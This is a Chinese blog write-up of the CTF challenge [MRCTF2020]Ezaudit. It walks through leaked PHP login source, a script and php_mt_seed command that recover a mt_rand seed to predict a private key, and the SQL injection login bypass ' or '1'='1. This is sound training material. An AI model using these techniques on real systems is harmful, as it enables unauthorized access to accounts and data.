buu-[MRCTF2020]Ezaudit

最新推荐文章于 2024-06-06 18:05:34 发布
最新推荐文章于 2024-06-06 18:05:34 发布
阅读量173 收藏
点赞数 1
分类专栏: buuctf-web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qaq517384/article/details/120895409
版权

dirsearch_master扫到www.zip
解压得到index.php
分为两部分
登录和公钥私钥

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 

// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

给了个Public_key,因为用到了mt_rand(),所以很容易想到php的伪随机数

之前 [GWCTF 2019]枯燥的抽奖 有写过

先将数列转化成php_mt_seed脚本可读的字符串
php_mt_seed脚本链接
git clone后再执行make就可以了

string2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
public_key = 'KVQP0LdJKRaV3n9D'
seed = ''

for i in range(len(public_key)-1):
    for j in range(len(string2)-1):
        if public_key[i] == string2[j]:
            seed += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(string2)-1) + ' '

print(seed)

输出

36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

放linux里用php_mt_seed跑

./php_mt_seed 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

在这里插入图片描述

php版本调到5.几,我这里是5.3.4

<?php
mt_srand(1775196155);
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }
 
  //genarate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
echo public_key() . "<br>";
echo private_key();
 
?>

输出
KVQP0LdJKRaV3n9D
XuNhoueCDCGc
上面是公钥,下面是私钥

username随便
password没坑,’ or ‘1’='1 万能密码绕过就行
私钥就是上面跑出来的那个
在这里插入图片描述

有点水啊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[MRCTF2020]Xor
qaq517384的博客
03-06 298
32位无壳 执行 ida查看字符串
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3235
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF--[MRCTF2020]Ezaudit
qq_46263951的博客
07-15 365
进入页面发现好像也没有可以利用的地方,这里利用网站备份目录扫描脚本和dirsearch来进行扫描 扫描到www.zip、login.php、login.html,在www.zip下载后可以的到 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $passw.
[MRCTF2020]Ezaudit
feng的博客
04-13 262
知识点 www.zip泄露 PHP随机数问题 SQL注入 WP 进入环境扫一下常见的文件泄露,发现存在www.zip,下载下来: <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Privat
buuctf [MRCTF2020]Ezaudit 伪随机数
为之的博客
07-21 1213
打开网页,看不出什么,直接打开dirmap扫描 扫出了www.zip 下载后有index.php文件 查看源码后大概意思就是 去login.html页面登录,输入账号密码以及私钥,后2个输对了就能得到flag 密码可以直接用万能钥匙 1' or '1'='1 来绕过,主要就是私钥了 这里涉及到mt_srand()函数,伪随机数,即这随机数是我们可以预测的,只要找到该函数在这的种子值就可以预测, 因为公钥私钥都是使用一个种子值来推...
BUU--[MRCTF2020]PixelShooter
weixin_52369224的博客
11-18 3858
第一次遇到的安卓题类型(不会写。。。 一个小游戏。试着玩了会,没找到。 jadx打开,看了好一会,没看出个所以然来,去IDA看了看so文件,也没有收获 最后:看了其他师傅的wp 这是一款安卓unity游戏,安卓unity游戏的核心逻辑一般位于assets\bin\Data\Managed\Assembly-CSharp.dll 用jeb打开 搜索得到flag flag{Unity_1S_Fun_233} ...
BUU-MISC-[MRCTF2020]Hello_misc
qq_24033605的博客
05-27 567
[MRCTF2020]Hello_ misc zsteg分析图片,发现其中包含一个zip文件。用binbwalk分解出来。 得到一个加密的压缩包。 stegsolve分析图片,通过red通道,发现又含另一张图片。 得到压缩包的密码。 得到一个全是数字的txt文本,借助网上的脚本分析一下。 with open('out.txt') as a_file: content = [x.strip() for x in a_file.readlines()] bins = [] for i in co
BUUCTF-MRCTF2020
Atkx's Blog
08-08 5237
目录标题Ezpop套娃 Ezpop 套娃 查看源码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t']))
buu-[MRCTF2020]PixelShooter
qaq517384的博客
03-24 7721
下载一个apk文件 没玩出flag( Jeb打开 也是unity游戏 该找Assembly-CSharp.dll文件了 导出拖到ida,shift+f12没字符串的 在字节处查找 其实Jeb直接查找也行来看看 flag{Unity_1S_Fun_233}
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
【全开源】旅游门票预订系统(FastAdmin+ThinkPHP+Uniapp)
2401_84413757的博客
06-03 305
一款基于FastAdmin+ThinkPHP+Uniapp开发的旅游门票预订系统,支持景点门票、导游产品便捷预订、美食打卡、景点分享、旅游笔记分享等综合系统,提供前后台无加密源码,支持私有化部署。 ​便捷你的每一次出行🌍 🌟 轻松预订,说走就走 🎒 每当计划一场旅行,最让人头疼的莫过于门票的预订。传统的排队购票不仅浪费时间,还可能因为售罄而错过心仪的景点。而现在,有了旅游门票预订系统,一切变得简单而高效。📱只需动动手指,就能轻松预订心仪的景点门票,说走就走,不再受时间和地点的限制。 🌈 全面覆盖,任
php fpdf使用记录
meis27461的博客
06-01 359
使用composer安装fpdf简单创建一个pdf文件并输出下载。
文件包含漏洞
大河之犬的博客
06-02 715
当用户以某种方式控制即将由服务器加载的文件时,就会出现漏洞。远程文件包含(RFI): 从远程服务器加载文件。在php中,默认情况下禁用此功能(本地文件包含(LFI): 服务器加载本地文件PHP 过滤器允许在数据被读取或写入之前执行基本的修改操作。有 5 类过滤器:1、字符串过滤器string.strip_tags: 从数据中删除标签(位于 “” 字符之间的所有内容)2、转换过滤器:转换为不同的编码(iconv -l滥用。
二叉树-堆的详解
最新发布
HardenMvp1的博客
06-06 792
二叉树-堆的详解
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值